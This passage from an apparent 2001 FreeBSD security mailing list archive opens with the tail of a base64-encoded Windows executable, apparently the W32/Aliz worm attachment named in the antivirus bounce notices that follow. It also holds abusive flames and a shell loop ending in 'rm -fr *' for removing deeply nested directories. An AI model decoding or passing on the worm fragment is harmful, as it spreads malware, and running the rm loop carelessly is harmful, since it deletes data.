JmG+by04xDU56jH3Szgkcv8Ic2Y8vkXAZLq3x4pxdZ027oaDchzw YZ4FKHADPEhUTUw+CAxFQUQULweHQk/GWQw1aWaEF6kdj4NjPTNE p+FkOlMwGkU9Q0nPFm+Dj3QnKzCHYmSf9ApqeTBPO6fNXoMotv0h KKosDNQOU5+qba3n4mF1gapvL3j6Ydt2T+lbVA3mLXcO0POCyC54 +a/oxWKgcDZSNCOUtGUoPHW+Sn4GgVtpDhYgeFFVSVTADAeinOKR AKflW54fEm/vAS6v5m7wO0lhdPF+3NIKdvQ4I8OAJqR3fKlIoAA0 8nYaLD1JgAPhKdjOKF+GA0gJNjlWl1BJwE6x3LABxkeH5wPHVf3F QRoIV4zwQ0szH+DpAPZfJ/jiFr/ZAItrJEnIL10lHp9YfMX/U+OA 7Dx74AWAFkxGpxwxMAD/JTQwQAD/JTgwQAAAAAAAKDAAALPCHzcA APe/QDAAADQwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE4wAABeMAAA AAAAAHNy6HcxcOh3AAAAAEtFUk5FTDMyLmRsbAAAAABMb2FkTGli cmFyeUEAAAAAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ADVq= --bound-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:29:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.appliedcard.com (mail.appliedcard.com [207.43.202.218]) by hub.freebsd.org (Postfix) with ESMTP id 875F237B448 for ; Fri, 23 Nov 2001 01:27:04 -0800 (PST) From: BocaRaton4@appliedcard.com X-Priority: 3 (Normal) Date: Fri, 23 Nov 2001 04:26:09 -0500 Subject: Report to Recipient(s) To: security@FreeBSD.ORG Message-ID: X-MIMETrack: Serialize by Router on BocaRaton4/WILM/ACS(Release 5.0.5 |September 22, 2000) at 11/23/2001 04:26:16 AM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Incident Information:- Originator: owner-freebsd-security@FreeBSD.ORG Recipients: security@FreeBSD.ORG Subject: some shit to see WARNING: The file whatever.exe you received was infected with the W32/Aliz@MM virus. The file attachment was not successfully cleaned. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:30:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp-1.nordnet.fr (smtp-1.nordnet.fr [194.206.126.239]) by hub.freebsd.org (Postfix) with ESMTP id C131737B6A2 for ; Fri, 23 Nov 2001 01:27:35 -0800 (PST) Received: from pop-3.nordnet.fr (pop-3.nordnet.fr [192.168.164.131]) by smtp-1.nordnet.fr (8.9.0/8.9.0) with ESMTP id KAA19245 for ; Fri, 23 Nov 2001 10:27:21 +0100 From: root@pop-3.nordnet.fr Received: (from root@localhost) by pop-3.nordnet.fr (8.9.3/8.9.3) id KAA13616 Fri, 23 Nov 2001 10:27:18 +0100 Date: Fri, 23 Nov 2001 10:27:18 +0100 Message-Id: <200111230927.KAA13616@pop-3.nordnet.fr> To: security@FreeBSD.ORG Subject: ALERTE: VIRUS DETECTE DANS UN MESSAGE ENVOYE PAR owner-freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org A L E R T E V I R U S Notre système de détection automatique anti-virus a détecté un virus dans un message qui vous a été envoyé par jflowers@ezo.net. La distribution de ce message a été stoppée. Veuillez vous rapprocher de l'émetteur jflowers@ezo.net pour régler avec lui le problème. ************ Votre PC est-il bien protégé ? Pour une protection performante et autonome, www.securitoo.com/indexml.php est la solution contre tous les virus connus et à venir. ************ Is your PC really protected ? For the best protection, www.securitoo.com/indexml.php is the solution that will protect your PC from all known viruses and viruses to be. ************ V I R U S A L E R T Our anti-virus system has detected a virus in an email sent by jflowers@ezo.net. We have stopped the delivery of this email. We invite you to contact jflowers@ezo.net to solve the problem. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:30:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from dispatch1.mail.gxn.net (dispatch1.mail.gxn.net [195.224.255.102]) by hub.freebsd.org (Postfix) with ESMTP id 886B837B43D for ; Fri, 23 Nov 2001 01:29:47 -0800 (PST) Received: from [195.224.162.195] (helo=lorean.aht.org.uk ident=hidden-user) by dispatch1 with esmtp (Exim 3.22 #1) id 167Cg7-0005Ml-00 for security@freebsd.org; Fri, 23 Nov 2001 09:31:23 +0000 Received: from mail.aht.org.uk (not verified[191.9.206.3]) by lorean.aht.org.uk with MailMarshal (4,2,0,0) id ; Fri, 23 Nov 2001 09:37:49 +0000 Received: by EXCHANGE with Internet Mail Service (5.5.2653.19) id ; Fri, 23 Nov 2001 09:27:14 -0000 Message-ID: <13E8590EE45BD411A3460050DA922EE3013630A9@EXCHANGE> From: EXCHANGE Panda Antivirus for Exchange Server To: "'security@FreeBSD.ORG'" Subject: Virus incident Date: Fri, 23 Nov 2001 09:27:11 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Panda Antivirus has found the following viruses in the message: Server : EXCHANGE Sent by : jflowers@ezo.net Address : jflowers@ezo.net To : security@FreeBSD.ORG Subject : some shit to see Date : 23/11/2001 09:27 Exchange has detected a virus in your message. This has been dealt with accordingly. File : Virus : W32/Aliz - Disinfected http://www.pandasoftware.com ********************************************** Visit our website at www.aht.org.uk ********************************************** ##################################################################################### This e-mail message has been scanned for Viruses and Content and cleared by MailMarshal For more information please visit www.marshalsoftware.com ##################################################################################### To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:30:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from dispatch1.mail.gxn.net (dispatch1.mail.gxn.net [195.224.255.102]) by hub.freebsd.org (Postfix) with ESMTP id 2B45037B427 for ; Fri, 23 Nov 2001 01:29:58 -0800 (PST) Received: from [195.224.162.195] (helo=lorean.aht.org.uk ident=hidden-user) by dispatch1 with esmtp (Exim 3.22 #1) id 167CgD-0005N2-00 for security@freebsd.org; Fri, 23 Nov 2001 09:31:29 +0000 Received: from mail.aht.org.uk (not verified[191.9.206.3]) by lorean.aht.org.uk with MailMarshal (4,2,0,0) id ; Fri, 23 Nov 2001 09:38:01 +0000 Received: by EXCHANGE with Internet Mail Service (5.5.2653.19) id ; Fri, 23 Nov 2001 09:27:26 -0000 Message-ID: <13E8590EE45BD411A3460050DA922EE3013630AB@EXCHANGE> From: EXCHANGE Panda Antivirus for Exchange Server To: "'security@FreeBSD.ORG'" Subject: Virus incident Date: Fri, 23 Nov 2001 09:27:17 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Panda Antivirus has found the following viruses in the message: Server : EXCHANGE Sent by : jflowers@ezo.net Address : jflowers@ezo.net To : security@FreeBSD.ORG Subject : some shit to see Date : 23/11/2001 09:27:16 Exchange has detected a virus in your message. This has been dealt with accordingly. File : whatever.exe inside: some shit to see Virus : W32/Aliz - Ignored http://www.pandasoftware.com ********************************************** Visit our website at www.aht.org.uk ********************************************** ##################################################################################### This e-mail message has been scanned for Viruses and Content and cleared by MailMarshal For more information please visit www.marshalsoftware.com ##################################################################################### To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:31:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by hub.freebsd.org (Postfix) with ESMTP id B011037B702 for ; Fri, 23 Nov 2001 01:31:40 -0800 (PST) Received: from fpsn.net (control.fpsn.net [63.224.69.60]) (authenticated) by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id fAN9VWv11910 for ; Fri, 23 Nov 2001 02:31:32 -0700 (MST) Message-ID: <3BFE1762.A63EF451@fpsn.net> Date: Fri, 23 Nov 2001 02:31:14 -0700 From: Colin Faber X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: Virus incident References: <13E8590EE45BD411A3460050DA922EE3013630A3@EXCHANGE> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org VIRUS IN YOUR MAIL, ALERTE: VIRUS DETECTE DANS UN MESSAGE ENVOYE PAR etc etc etc. Okay, can we fix this crap now? Obviously the tards running these MTAs failed to read their documentation before utilizing the software. I'm growing tired of seeing these messages fly by everytime some stupid outlook user makes it on this list. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:34:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from cygnus.ahlstrom.net (cygnus.ahlstrom.net [141.127.2.8]) by hub.freebsd.org (Postfix) with ESMTP id F065D37B417 for ; Fri, 23 Nov 2001 01:34:08 -0800 (PST) Received: from ahlstromsmtp.ahlstrom.com (ahlstromsmtp.ahlstrom.com [141.127.2.58]) by cygnus.ahlstrom.net (8.9.3/8.9.3) with ESMTP id JAA46278 for ; Fri, 23 Nov 2001 09:34:08 GMT (envelope-from ahlstromsmtp/Ahlstrom@notes.ahlstrom.com) From: ahlstromsmtp/Ahlstrom@notes.ahlstrom.com X-Priority: 3 (Normal) Date: Fri, 23 Nov 2001 11:27:02 +0200 Subject: Report to Recipient(s) To: security@FreeBSD.ORG Message-ID: X-MIMETrack: Serialize by Router on ahlstromsmtp/Ahlstrom(Release 5.0.6a |January 17, 2001) at 23.11.2001 11:34:08 MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Incident Information:- Originator: owner-freebsd-security@FreeBSD.ORG Recipients: security@FreeBSD.ORG Subject: some shit to see WARNING: The file whatever.exe you received was infected with the W32/Aliz@MM virus. The file attachment was not successfully cleaned. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:42:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [216.33.66.196]) by hub.freebsd.org (Postfix) with ESMTP id F216937B416 for ; Fri, 23 Nov 2001 01:42:56 -0800 (PST) Received: by elvis.mu.org (Postfix, from userid 1098) id C9B7081D14; Fri, 23 Nov 2001 03:42:56 -0600 (CST) Date: Fri, 23 Nov 2001 03:42:56 -0600 From: Bill Fumerola To: Anthony Atkielski Cc: freebsd-security@FreeBSD.ORG Subject: Re: setuid on nethack? Message-ID: <20011123034256.V81711@elvis.mu.org> References: <014201c17336$40653f90$0a00000a@atkielski.com><20011122112415.B855@straylight.oblivion.bg><016001c17338$37d65240$0a00000a@atkielski.com><20011122114813.C855@straylight.oblivion.bg><016601c1733d$7a516b00$0a00000a@atkielski.com> <03a801c17399$ba011c30$0a00000a@atkielski.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <03a801c17399$ba011c30$0a00000a@atkielski.com>; from anthony@freebie.atkielski.com on Thu, Nov 22, 2001 at 10:07:42PM +0100 X-Operating-System: FreeBSD 4.4-FEARSOME-20010909 i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org [ removing x-post to -questions ] On Thu, Nov 22, 2001 at 10:07:42PM +0100, Anthony Atkielski wrote: > Alas! This does not make me feel warm and fuzzy! It's a good thing I'm not > installing this at a bank. good thing, indeed! if you were installing this at a bank you would clearly be underqualified to understand how to evaluate 3rd party software and the bank would have a made a huge mistake in assigning you the task. the freebsd project provides the ports tree as a build infrastructure, not as a blessed software repository. while freebsd's ports committers and security officer are very quick to respond to security fixes, often quicker then the software author(s); it would be impossible to audit 6000+ moving targets worth of install scripts and make glue. the post you responded to even pointed out that you can build the software as a normal user. only install as root, if you're truely paranoid you only have to examine the install stage for all those secret backdoors. if you still don't feel warm and fuzzy, consider codine. -- - bill fumerola / fumerola@yahoo-inc.com / billf@FreeBSD.org / billf@mu.org - my anger management counselor can beat up your self-affirmation therapist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:52:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wellserv.com (mail.wellserv.com [63.73.12.188]) by hub.freebsd.org (Postfix) with ESMTP id 4C2EA37B405 for ; Fri, 23 Nov 2001 01:52:34 -0800 (PST) Received: from seafoam.wellserv.com (seafoam.wellserv.com [63.73.12.187]) by mail.wellserv.com (8.9.3/8.9.3) with ESMTP id EAA12748 for ; Fri, 23 Nov 2001 04:52:33 -0500 (EST) (envelope-from paul@wellserv.com) Received: by seafoam.wellserv.com with Internet Mail Service (5.5.2653.19) id ; Fri, 23 Nov 2001 04:52:32 -0500 Message-ID: <9852F4A7EDFA8D449D52239131CBAEE4030BE4@seafoam.wellserv.com> From: "Paul F. Wells" To: security@FreeBSD.ORG Subject: RE: Virus incident Date: Fri, 23 Nov 2001 04:52:30 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Just how big of a bigot does one have to be before someone kicks the bigot in his big, fat, fucking head? -----Original Message----- From: Colin Faber [mailto:cfaber@fpsn.net] Sent: Friday, November 23, 2001 4:31 AM To: security@FreeBSD.ORG Subject: Re: Virus incident VIRUS IN YOUR MAIL, ALERTE: VIRUS DETECTE DANS UN MESSAGE ENVOYE PAR etc etc etc. Okay, can we fix this crap now? Obviously the tards running these MTAs failed to read their documentation before utilizing the software. I'm growing tired of seeing these messages fly by everytime some stupid outlook user makes it on this list. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:53: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from freebie.atkielski.com (ASt-Lambert-101-2-1-14.abo.wanadoo.fr [193.251.59.14]) by hub.freebsd.org (Postfix) with ESMTP id 9118D37B405 for ; Fri, 23 Nov 2001 01:53:01 -0800 (PST) Received: from contactdish (win.atkielski.com [10.0.0.10]) by freebie.atkielski.com (8.11.3/8.11.3) with SMTP id fAN9qsJ03289; Fri, 23 Nov 2001 10:52:55 +0100 (CET) (envelope-from anthony@freebie.atkielski.com) Message-ID: <051901c17404$a03391f0$0a00000a@atkielski.com> From: "Anthony Atkielski" To: "Bill Fumerola" , References: <014201c17336$40653f90$0a00000a@atkielski.com><20011122112415.B855@straylight.oblivion.bg><016001c17338$37d65240$0a00000a@atkielski.com><20011122114813.C855@straylight.oblivion.bg><016601c1733d$7a516b00$0a00000a@atkielski.com> <03a801c17399$ba011c30$0a00000a@atkielski.com> <20011123034256.V81711@elvis.mu.org> Subject: Re: setuid on nethack? Date: Fri, 23 Nov 2001 10:52:55 +0100 Organization: Anthony's Home Page (development site) MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Bill writes: > if you still don't feel warm and fuzzy, > consider codine. What is codine? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 2: 7:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp.netnam.vn (smtp.netnam.vn [203.162.7.93]) by hub.freebsd.org (Postfix) with ESMTP id 970C837B405 for ; Fri, 23 Nov 2001 02:07:40 -0800 (PST) Received: from mailserver ([10.9.4.34]) by smtp.netnam.vn (8.10.2/8.10.2) with ESMTP id fANA88v07327; Fri, 23 Nov 2001 17:08:11 +0700 (GMT) Received: from 192.168.0.29 by mailserver ([192.168.0.2] running VPOP3) with ESMTP; Fri, 23 Nov 2001 16:57:06 +0700 Message-Id: <5.1.0.14.2.20011123165118.0239eb00@MailServer> X-Sender: stefan.probst@MailServer X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Fri, 23 Nov 2001 16:54:07 +0700 To: Colin Faber , security@FreeBSD.ORG From: Stefan Probst Subject: Re: Virus incident In-Reply-To: <3BFE1762.A63EF451@fpsn.net> References: <13E8590EE45BD411A3460050DA922EE3013630A3@EXCHANGE> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Server: VPOP3 V1.4.6 - Registered Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 02:31 23.11.2001 -0700, Colin Faber wrote: ------------------------- > >Okay, can we fix this crap now? Obviously the tards running these MTAs >failed to read their documentation before utilizing the software. > >I'm growing tired of seeing these messages fly by everytime some stupid >outlook user makes it on this list. > You mean somebody spreads an OTD (Outlook Transmitted Disease)? Stefan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 2:45: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from c7.campus.utcluj.ro (c7.campus.utcluj.ro [193.226.6.226]) by hub.freebsd.org (Postfix) with SMTP id D6D5C37B416 for ; Fri, 23 Nov 2001 02:44:50 -0800 (PST) Received: (qmail 10159 invoked by uid 1008); 23 Nov 2001 10:45:55 -0000 Date: Fri, 23 Nov 2001 12:45:53 +0200 From: veedee@c7.campus.utcluj.ro To: freebsd-security@freebsd.org Subject: Re: fts_print bug? Message-ID: <20011123124553.A10122@c7.campus.utcluj.ro> References: <20011123015505.A5165@c7.campus.utcluj.ro> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011123015505.A5165@c7.campus.utcluj.ro>; from veedee@c7.campus.utcluj.ro on Fri, Nov 23, 2001 at 01:55:05AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Nov 23, 2001 at 01:55:05AM +0200, veedee@c7.campus.utcluj.ro wrote: > > Does anyone know anything about this? > > It didn't worked on my box (4.3-RELEASE), but it did make some directories > which I can't erase anymore... > > [#] rm -r 4965/ > rm: fts_read: File name too long Here's a little command to help remove those created subdirs... while true ;do for i in *;do cd "$i" && mv -f * .. && cd ..;done; rm -fr * && break;done; Thanks to tendogz (#freebsd) for providing it... PS. Feels kinda funny replying to myself :) Best regards, Radu Bogdan Rusu (aka veedee) C7 Campus Network System Administrator To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 3:46:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from pps.de (mail.pps.de [217.13.200.134]) by hub.freebsd.org (Postfix) with ESMTP id CCBEB37B416 for ; Fri, 23 Nov 2001 03:46:12 -0800 (PST) Received: from jung7.pps.de (jung7.pps.de [192.9.200.17]) by pps.de (8.9.3/8.9.3) with ESMTP id MAA95322 for ; Fri, 23 Nov 2001 12:50:22 +0100 (CET) (envelope-from petros@pps.de) Received: from aprilsonne.pps.de by jung7.pps.de (8.9.3+Sun/ZRZ-Sol2) id MAA22768; Fri, 23 Nov 2001 12:46:04 +0100 (MET) Received: from aprilsonne by aprilsonne.pps.de (8.9.1b+Sun/ZRZ-Sol2) id MAA24434; Fri, 23 Nov 2001 12:46:04 +0100 (MET) Message-Id: <200111231146.MAA24434@aprilsonne.pps.de> Date: Fri, 23 Nov 2001 12:46:04 +0100 (MET) From: Peter Ross Reply-To: Peter Ross Subject: natd: failed to write packet back (Permission denied) To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Content-MD5: GIcAIOk9I4ALiSiKpm0lWg== X-Mailer: dtmail 1.3.0 @(#)CDE Version 1.3.5 SunOS 5.7 sun4u sparc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, last month I installed a working (AFAIK;-) firewall using FreeBSD 4.4, ipfw and natd. Sometimes I get a message: > Nov 22 17:31:25 tor natd[456]: failed to write packet back (Permission > denied) > Nov 22 17:31:58 tor last message repeated 6 times There are approximately 30 packets per day causing this message. I can't find a corresponding message in the ipfw-logs. While my firewall continues to work, my former FreeBSD 3.x firewall stopped in this case from time to time. Should I be worried? I hope there isn't a mistake in the ipfw rules.. Thanks for advice Peter Ross ******************************************************* Dipl.Inf. Peter Ross Mail: petros@pps.de Presse Programm Service Berlin - Systems administration ******************************************************* To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 3:58:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from c7.campus.utcluj.ro (c7.campus.utcluj.ro [193.226.6.226]) by hub.freebsd.org (Postfix) with SMTP id 638B237B416 for ; Fri, 23 Nov 2001 03:58:52 -0800 (PST) Received: (qmail 11682 invoked by uid 1008); 23 Nov 2001 11:59:34 -0000 Date: Fri, 23 Nov 2001 13:59:34 +0200 From: veedee@c7.campus.utcluj.ro To: Peter Ross Cc: freebsd-security@freebsd.org Subject: Re: natd: failed to write packet back (Permission denied) Message-ID: <20011123135934.A11605@c7.campus.utcluj.ro> References: <200111231146.MAA24434@aprilsonne.pps.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200111231146.MAA24434@aprilsonne.pps.de>; from petros@pps.de on Fri, Nov 23, 2001 at 12:46:04PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Nov 23, 2001 at 12:46:04PM +0100, Peter Ross wrote: > Hi, > last month I installed a working (AFAIK;-) firewall using FreeBSD 4.4, ipfw > and natd. Have you considered using ipf/ipnat instead? > Sometimes I get a message: > > Nov 22 17:31:25 tor natd[456]: failed to write packet back (Permission > > denied) > > Nov 22 17:31:58 tor last message repeated 6 times > There are approximately 30 packets per day causing this message. > I can't find a corresponding message in the ipfw-logs. > While my firewall continues to work, my former FreeBSD 3.x firewall stopped > in this case from time to time. > Should I be worried? I hope there isn't a mistake in the ipfw rules.. Not really. The messages are caused by physical link problems. I get the same messages when the link to my ISP fails from time to time (eg. it disconnects). It has nothing to do whatsoever with the ipfw rules. > Thanks for advice > Peter Ross > > ******************************************************* > Dipl.Inf. Peter Ross Mail: petros@pps.de > Presse Programm Service Berlin - Systems administration > ******************************************************* Hope this helps, Radu Bogdan Rusu (aka veedee) C7 Campus Network System Administrator To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 4: 0: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from c7.campus.utcluj.ro (c7.campus.utcluj.ro [193.226.6.226]) by hub.freebsd.org (Postfix) with SMTP id 45E4E37B417 for ; Fri, 23 Nov 2001 03:59:53 -0800 (PST) Received: (qmail 11706 invoked by uid 1008); 23 Nov 2001 12:00:56 -0000 Date: Fri, 23 Nov 2001 14:00:56 +0200 From: veedee@c7.campus.utcluj.ro To: Peter Ross Cc: freebsd-security@freebsd.org Subject: Re: natd: failed to write packet back (Permission denied) Message-ID: <20011123140056.B11605@c7.campus.utcluj.ro> References: <200111231146.MAA24434@aprilsonne.pps.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200111231146.MAA24434@aprilsonne.pps.de>; from petros@pps.de on Fri, Nov 23, 2001 at 12:46:04PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Uhm, I forgot... aren't we supposed to discuss this on another mailing list? :) Like freebsd-net? Sorries... Radu Bogdan Rusu (aka veedee) C7 Campus Network System Administrator On Fri, Nov 23, 2001 at 12:46:04PM +0100, Peter Ross wrote: > Hi, > > last month I installed a working (AFAIK;-) firewall using FreeBSD 4.4, ipfw > and natd. > > Sometimes I get a message: > > > Nov 22 17:31:25 tor natd[456]: failed to write packet back (Permission > > denied) > > Nov 22 17:31:58 tor last message repeated 6 times > > There are approximately 30 packets per day causing this message. > > I can't find a corresponding message in the ipfw-logs. > > While my firewall continues to work, my former FreeBSD 3.x firewall stopped > in this case from time to time. > > Should I be worried? I hope there isn't a mistake in the ipfw rules.. > > Thanks for advice > Peter Ross > > ******************************************************* > Dipl.Inf. Peter Ross Mail: petros@pps.de > Presse Programm Service Berlin - Systems administration > ******************************************************* > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 4:23: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailsrv.otenet.gr (mailsrv.otenet.gr [195.170.0.5]) by hub.freebsd.org (Postfix) with ESMTP id 3FDAA37B41B for ; Fri, 23 Nov 2001 04:22:54 -0800 (PST) Received: from hades.hell.gr (patr530-b206.otenet.gr [212.205.244.214]) by mailsrv.otenet.gr (8.11.5/8.11.5) with ESMTP id fANCMnY06545; Fri, 23 Nov 2001 14:22:49 +0200 (EET) Received: (from charon@localhost) by 